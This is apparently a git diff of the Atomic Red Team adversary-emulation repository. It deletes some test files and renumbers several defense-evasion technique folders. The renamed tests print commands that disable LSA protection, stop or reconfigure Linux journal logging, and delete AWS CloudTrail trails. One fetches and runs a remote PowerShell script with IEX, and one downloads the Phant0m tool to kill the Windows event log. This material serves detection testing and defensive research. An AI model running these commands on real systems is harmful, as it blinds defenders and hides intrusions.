-          # Clear DNS client cache
-          Clear-DnsClientCache
-          Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
-      }
-
-      catch {
-          Write-Host "An error occurred: $_"
-      }
-      Clear-DnsClientCache
-    name: powershell
-    elevation_required: true
diff --git a/atomics/T1562/T1562.md b/atomics/T1562/T1562.md
deleted file mode 100644
index c4d31d89..00000000
--- a/atomics/T1562/T1562.md
+++ /dev/null
@@ -1,82 +0,0 @@
-# T1562 - Impair Defenses
-
-## Description from ATT&CK
-
-> Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
-> 
-> Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
-> 
-
-[Source](https://attack.mitre.org/techniques/T1562)
-
-## Atomic Tests
-
-- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
-- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
-- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
-
-### Atomic Test #1: Windows Disable LSA Protection
-
-The following Atomic adds a registry entry to disable LSA Protection.
-
-The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
-Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
-https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
-https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
-https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
-
-**Supported Platforms:** Windows
-
-**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-```cmd
-reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
-```
-
-#### Cleanup Commands
-
-```cmd
-reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
-```
-### Atomic Test #2: Disable journal logging via systemctl utility
-
-The atomic test disables the journal logging using built-in systemctl utility
-
-**Supported Platforms:** Linux
-
-**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
-
-#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-
-```sh
-sudo systemctl stop systemd-journald #disables journal logging
-```
-
-#### Cleanup Commands
-
-```sh
-sudo systemctl start systemd-journald #starts journal service
-sudo systemctl enable systemd-journald #starts journal service automatically at boot time
-```
-### Atomic Test #3: Disable journal logging via sed utility
-
-The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
-
-**Supported Platforms:** Linux
-
-**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
-
-#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
-
-```sh
-sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
-```
-
-#### Cleanup Commands
-
-```sh
-sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
-sudo systemctl restart systemd-journald #restart the journal service
-```
diff --git a/atomics/T1562/T1562.yaml b/atomics/T1562/T1562.yaml
deleted file mode 100644
index a94da9a3..00000000
--- a/atomics/T1562/T1562.yaml
+++ /dev/null
@@ -1,50 +0,0 @@
-attack_technique: T1562
-display_name: 'Impair Defenses'
-atomic_tests:
-- name: Windows Disable LSA Protection
-  auto_generated_guid: 40075d5f-3a70-4c66-9125-f72bee87247d
-  description: |
-    The following Atomic adds a registry entry to disable LSA Protection.
-
-    The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
-    Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
-    https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
-    https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
-    https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/  
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
-    cleanup_command: |
-      reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
-    name: command_prompt
-    elevation_required: true
-- name: Disable journal logging via systemctl utility
-  auto_generated_guid: c3a377f9-1203-4454-aa35-9d391d34768f
-  description: |
-    The atomic test disables the journal logging using built-in systemctl utility
-  supported_platforms:
-  - linux
-  executor:
-    command: |
-      sudo systemctl stop systemd-journald #disables journal logging
-    cleanup_command: |
-      sudo systemctl start systemd-journald #starts journal service
-      sudo systemctl enable systemd-journald #starts journal service automatically at boot time
-    name: sh
-    elevation_required: true
-- name: Disable journal logging via sed utility
-  auto_generated_guid: 12e5551c-8d5c-408e-b3e4-63f53b03379f
-  description: |
-    The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
-  supported_platforms:
-  - linux
-  executor:
-    command: |
-      sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
-    cleanup_command: |
-      sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
-      sudo systemctl restart systemd-journald #restart the journal service
-    name: sh
-    elevation_required: true
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1685.001/T1685.001.md
similarity index 97%
rename from atomics/T1562.002/T1562.002.md
rename to atomics/T1685.001/T1685.001.md
index 05aeb776..7b6c99bd 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1685.001/T1685.001.md
@@ -1,4 +1,4 @@
-# T1562.002 - Impair Defenses: Disable Windows Event Logging
+# T1685.001 - Disable or Modify Tools: Disable or Modify Windows Event Log
 
 ## Description from ATT&CK
 
@@ -10,11 +10,11 @@
 > 
 > There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security</code>, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System</code> and <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application</code> to disable the entire EventLog.(Citation: disable_win_evt_logging)
 > 
-> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1562.002_redcanaryco)
+> Additionally, adversaries may use <code>auditpol</code> and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the <code>/success</code> or <code>/failure</code> parameters. For example, <code>auditpol /set /category:”Account Logon” /success:disable /failure:disable</code> turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1685.001_redcanaryco) To clear the audit policy, adversaries may run the following lines: <code>auditpol /clear /y</code> or <code>auditpol /remove /allusers</code>.(Citation: T1685.001_redcanaryco)
 > 
 > By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
 
-[Source](https://attack.mitre.org/techniques/T1562/002)
+[Source](https://attack.mitre.org/techniques/T1685/001)
 
 ## Atomic Tests
 
@@ -200,7 +200,7 @@ Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1562.002&#92;bin&#92;Phant0m.exe|
+| file_name | exe version of Phant0m | path | PathToAtomicsFolder&#92;T1685.001&#92;bin&#92;Phant0m.exe|
 
 #### Attack Commands: Run with `command_prompt`!
 
@@ -228,7 +228,7 @@ if (Test-Path "#{file_name}") {exit 0} else {exit 1}
 
 ```powershell
 New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
 ```
 
 ### Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell
diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1685.001/T1685.001.yaml
similarity index 97%
rename from atomics/T1562.002/T1562.002.yaml
rename to atomics/T1685.001/T1685.001.yaml
index 91edceee..5f03fd79 100644
--- a/atomics/T1562.002/T1562.002.yaml
+++ b/atomics/T1685.001/T1685.001.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.002
-display_name: 'Impair Defenses: Disable Windows Event Logging'
+attack_technique: T1685.001
+display_name: 'Disable or Modify Tools: Disable or Modify Windows Event Log'
 atomic_tests:
 - name: Disable Windows IIS HTTP Logging
   auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
@@ -129,7 +129,7 @@ atomic_tests:
     file_name:
       description: exe version of Phant0m
       type: path
-      default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
+      default: PathToAtomicsFolder\T1685.001\bin\Phant0m.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -138,7 +138,7 @@ atomic_tests:
       if (Test-Path "#{file_name}") {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1685.001/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
   executor:
     command: |
       "#{file_name}"
diff --git a/atomics/T1562.002/bin/phant0m.exe b/atomics/T1685.001/bin/phant0m.exe
similarity index 100%
rename from atomics/T1562.002/bin/phant0m.exe
rename to atomics/T1685.001/bin/phant0m.exe
diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1685.002/T1685.002.md
similarity index 97%
rename from atomics/T1562.008/T1562.008.md
rename to atomics/T1685.002/T1685.002.md
index 18a650f8..7f221bf4 100644
--- a/atomics/T1562.008/T1562.008.md
+++ b/atomics/T1685.002/T1685.002.md
@@ -1,4 +1,4 @@
-# T1562.008 - Impair Defenses: Disable Cloud Logs
+# T1685.002 - Disable or Modify Tools: Disable or Modify Cloud Log
 
 ## Description from ATT&CK
 
@@ -6,7 +6,7 @@
 > 
 > For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
 
-[Source](https://attack.mitre.org/techniques/T1562/008)
+[Source](https://attack.mitre.org/techniques/T1685/002)
 
 ## Atomic Tests
 
@@ -49,7 +49,7 @@ aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
 #### Cleanup Commands
 
 ```sh
-cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
+cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
 terraform destroy -auto-approve
 ```
 
@@ -88,13 +88,13 @@ echo Please install the terraform and configure your aws default profile
 ###### Check Prereq Commands
 
 ```sh
-if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
+if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
 ```
 
 ###### Get Prereq Commands
 
 ```sh
-cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
+cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
 terraform init
 terraform apply -auto-approve
 ```
@@ -132,7 +132,7 @@ Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_n
 #### Cleanup Commands
 
 ```powershell
-cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
+cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
 terraform destroy -auto-approve
 ```
 
@@ -185,13 +185,13 @@ echo Configure your Azure account using: az login.
 ###### Check Prereq Commands
 
 ```powershell
-try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
+try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
 ```
 
 ###### Get Prereq Commands
 
 ```powershell
-cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
+cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
 terraform init
 terraform apply -auto-approve
 ```
@@ -262,7 +262,7 @@ Update event selectors in AWS CloudTrail to disable the logging of certain manag
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
+| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
 | aws_region | AWS region to detonate | string | us-west-2|
 
 #### Attack Commands: Run with `sh`!
@@ -335,7 +335,7 @@ This Atomic test will use the Stratus Red Team will first setup a CloudTrail log
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
+| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
 | aws_region | AWS region to detonate | string | us-west-2|
 
 #### Attack Commands: Run with `sh`!
@@ -408,7 +408,7 @@ This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red
 
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src|
+| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1685.002/src|
 | aws_region | AWS region to detonate | string | us-west-2|
 
 #### Attack Commands: Run with `sh`!
diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1685.002/T1685.002.yaml
similarity index 97%
rename from atomics/T1562.008/T1562.008.yaml
rename to atomics/T1685.002/T1685.002.yaml
index 7e4a1bbd..4b5ff43e 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1685.002/T1685.002.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.008
-display_name: 'Impair Defenses: Disable Cloud Logs'
+attack_technique: T1685.002
+display_name: 'Disable or Modify Tools: Disable or Modify Cloud Log'
 atomic_tests:
 - name: AWS - CloudTrail Changes
   auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
@@ -36,9 +36,9 @@ atomic_tests:
   - description: |
       Check if the dependency resources are already present.
     prereq_command: |
-      if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
+      if [ -f "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
-      cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
+      cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
       terraform init
       terraform apply -auto-approve
   executor:
@@ -47,7 +47,7 @@ atomic_tests:
        aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
        aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
     cleanup_command: |
-      cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
+      cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-1/"
       terraform destroy -auto-approve
     name: sh
     elevation_required: false
@@ -104,9 +104,9 @@ atomic_tests:
   - description: |
       Create dependency resources using terraform
     prereq_command: |
-      try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
+      try {if (Test-Path "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
     get_prereq_command: |
-      cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
+      cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
       terraform init
       terraform apply -auto-approve
   executor:
@@ -118,7 +118,7 @@ atomic_tests:
     name: powershell
     elevation_required: false
     cleanup_command: |
-      cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
+      cd "$PathToAtomicsFolder/T1685.002/src/T1685.002-2/"
       terraform destroy -auto-approve
 - name: Office 365 - Exchange Audit Log Disabled
   auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
@@ -173,7 +173,7 @@ atomic_tests:
     stratus_path:
       description: Path of stratus binary
       type: path
-      default: $PathToAtomicsFolder/T1562.008/src
+      default: $PathToAtomicsFolder/T1685.002/src
     aws_region:
       description: AWS region to detonate
       type: string
@@ -228,7 +228,7 @@ atomic_tests:
     stratus_path:
       description: Path of stratus binary
       type: path
-      default: $PathToAtomicsFolder/T1562.008/src
+      default: $PathToAtomicsFolder/T1685.002/src
     aws_region:
       description: AWS region to detonate
       type: string
@@ -282,7 +282,7 @@ atomic_tests:
     stratus_path:
       description: Path of stratus binary
       type: path
-      default: $PathToAtomicsFolder/T1562.008/src
+      default: $PathToAtomicsFolder/T1685.002/src
     aws_region:
       description: AWS region to detonate
       type: string
diff --git a/atomics/T1562.008/src/T1562.008-1/T1562.008-1.tf b/atomics/T1685.002/src/T1685.002-1/T1685.007-1.tf
similarity index 100%
rename from atomics/T1562.008/src/T1562.008-1/T1562.008-1.tf
rename to atomics/T1685.002/src/T1685.002-1/T1685.007-1.tf
diff --git a/atomics/T1562.008/src/T1562.008-1/policy.json b/atomics/T1685.002/src/T1685.002-1/policy.json
similarity index 100%
rename from atomics/T1562.008/src/T1562.008-1/policy.json
rename to atomics/T1685.002/src/T1685.002-1/policy.json
diff --git a/atomics/T1562.008/src/T1562.008-1/terraform.tfvars b/atomics/T1685.002/src/T1685.002-1/terraform.tfvars
similarity index 100%
rename from atomics/T1562.008/src/T1562.008-1/terraform.tfvars
rename to atomics/T1685.002/src/T1685.002-1/terraform.tfvars
diff --git a/atomics/T1562.008/src/T1562.008-2/T1562.008-2.tf b/atomics/T1685.002/src/T1685.002-2/T1685.002-2.tf
similarity index 100%
rename from atomics/T1562.008/src/T1562.008-2/T1562.008-2.tf
rename to atomics/T1685.002/src/T1685.002-2/T1685.002-2.tf
diff --git a/atomics/T1562.008/src/T1562.008-2/terraform.tfvars b/atomics/T1685.002/src/T1685.002-2/terraform.tfvars
similarity index 100%
rename from atomics/T1562.008/src/T1562.008-2/terraform.tfvars
rename to atomics/T1685.002/src/T1685.002-2/terraform.tfvars
diff --git a/atomics/T1562.012/T1562.012.md b/atomics/T1685.004/T1685.004.md
similarity index 96%
rename from atomics/T1562.012/T1562.012.md
rename to atomics/T1685.004/T1685.004.md
index 41534671..8f8960c7 100644
--- a/atomics/T1562.012/T1562.012.md
+++ b/atomics/T1685.004/T1685.004.md
@@ -1,4 +1,4 @@
-# T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
+# T1685.004 - Disable or Modify Tools: Disable or Modify Linux Audit System Log
 
 ## Description from ATT&CK
 
@@ -8,7 +8,7 @@
 > 
 > With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
 
-[Source](https://attack.mitre.org/techniques/T1562/012)
+[Source](https://attack.mitre.org/techniques/T1685/004)
 
 ## Atomic Tests
 
diff --git a/atomics/T1562.012/T1562.012.yaml b/atomics/T1685.004/T1685.004.yaml
similarity index 95%
rename from atomics/T1562.012/T1562.012.yaml
rename to atomics/T1685.004/T1685.004.yaml
index 62384d49..97af4226 100644
--- a/atomics/T1562.012/T1562.012.yaml
+++ b/atomics/T1685.004/T1685.004.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1562.012
-display_name: 'Impair Defenses: Disable or Modify Linux Audit System'
+attack_technique: T1685.004
+display_name: 'Disable or Modify Tools: Disable or Modify Linux Audit System Log'
 atomic_tests:
 - name: Delete all auditd rules using auditctl
   auto_generated_guid: 33a29ab1-cabb-407f-9448-269041bf2856
diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1685.005/T1685.005.md
similarity index 93%
rename from atomics/T1070.001/T1070.001.md
rename to atomics/T1685.005/T1685.005.md
index 83c7ecbb..a7ec38d3 100644
--- a/atomics/T1070.001/T1070.001.md
+++ b/atomics/T1685.005/T1685.005.md
@@ -1,4 +1,4 @@
-# T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
+# T1685.005 - Disable or Modify Tools: Clear Windows Event Logs
 
 ## Description from ATT&CK
 
@@ -15,7 +15,7 @@
 > 
 > Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
 
-[Source](https://attack.mitre.org/techniques/T1070/001)
+[Source](https://attack.mitre.org/techniques/T1685/005)
 
 ## Atomic Tests
 
@@ -76,7 +76,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
 ```
 
 
diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1685.005/T1685.005.yaml
similarity index 90%
rename from atomics/T1070.001/T1070.001.yaml
rename to atomics/T1685.005/T1685.005.yaml
index c7ff9bfe..85cc45d1 100644
--- a/atomics/T1070.001/T1070.001.yaml
+++ b/atomics/T1685.005/T1685.005.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1070.001
-display_name: 'Indicator Removal on Host: Clear Windows Event Logs'
+attack_technique: T1685.005
+display_name: 'Disable or Modify Tools: Clear Windows Event Logs'
 atomic_tests:
 - name: Clear Logs
   auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967
@@ -56,6 +56,6 @@ atomic_tests:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
+      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1685.005\src\T1685.005-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
     name: powershell
     elevation_required: true
diff --git a/atomics/T1070.001/src/T1070.001-macrocode.txt b/atomics/T1685.005/src/T1685.005-macrocode.txt
similarity index 100%
rename from atomics/T1070.001/src/T1070.001-macrocode.txt
rename to atomics/T1685.005/src/T1685.005-macrocode.txt
diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1685.006/T1685.006.md
similarity index 98%
rename from atomics/T1070.002/T1070.002.md
rename to atomics/T1685.006/T1685.006.md
index 66217224..6ed8dfa8 100644
--- a/atomics/T1070.002/T1070.002.md
+++ b/atomics/T1685.006/T1685.006.md
@@ -1,4 +1,4 @@
-# T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
+# T1685.006 - Disable or Modify Tools: Clear Linux or Mac System Logs
 
 ## Description from ATT&CK
 
@@ -12,7 +12,7 @@
 > * <code>/var/log/maillog</code>: Mail server logs
 > * <code>/var/log/httpd/</code>: Web server access and error logs
 
-[Source](https://attack.mitre.org/techniques/T1070/002)
+[Source](https://attack.mitre.org/techniques/T1685/006)
 
 ## Atomic Tests
 
@@ -541,7 +541,7 @@ stat #{journal_folder}
 ###### Get Prereq Commands
 
 ```sh
-mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+mkdir -p #{journal_folder} && touch #{journal_folder}/T1685.006.journal
 ```
 
 ### Atomic Test #19: Overwrite Linux Mail Spool
diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1685.006/T1685.006.yaml
similarity index 98%
rename from atomics/T1070.002/T1070.002.yaml
rename to atomics/T1685.006/T1685.006.yaml
index 880e4eb6..52630dc4 100644
--- a/atomics/T1070.002/T1070.002.yaml
+++ b/atomics/T1685.006/T1685.006.yaml
@@ -1,5 +1,5 @@
-attack_technique: T1070.002
-display_name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
+attack_technique: T1685.006
+display_name: 'Disable or Modify Tools: Clear Linux or Mac System Logs'
 atomic_tests:
 - name: rm -rf
   auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
@@ -362,7 +362,7 @@ atomic_tests:
     prereq_command: |
       stat #{journal_folder}
     get_prereq_command: |
-      mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
+      mkdir -p #{journal_folder} && touch #{journal_folder}/T1685_006.journal
   executor:
     command: |
       sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1685/T1685.md
similarity index 74%
rename from atomics/T1562.001/T1562.001.md
rename to atomics/T1685/T1685.md
index 7d2abdd5..fc329e69 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1685/T1685.md
@@ -1,4 +1,4 @@
-# T1562.001 - Impair Defenses: Disable or Modify Tools
+# T1685 - Disable or Modify Tools
 
 ## Description from ATT&CK
 
@@ -6,7 +6,7 @@
 > 
 > Adversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional.  By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)
 > 
-> Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)
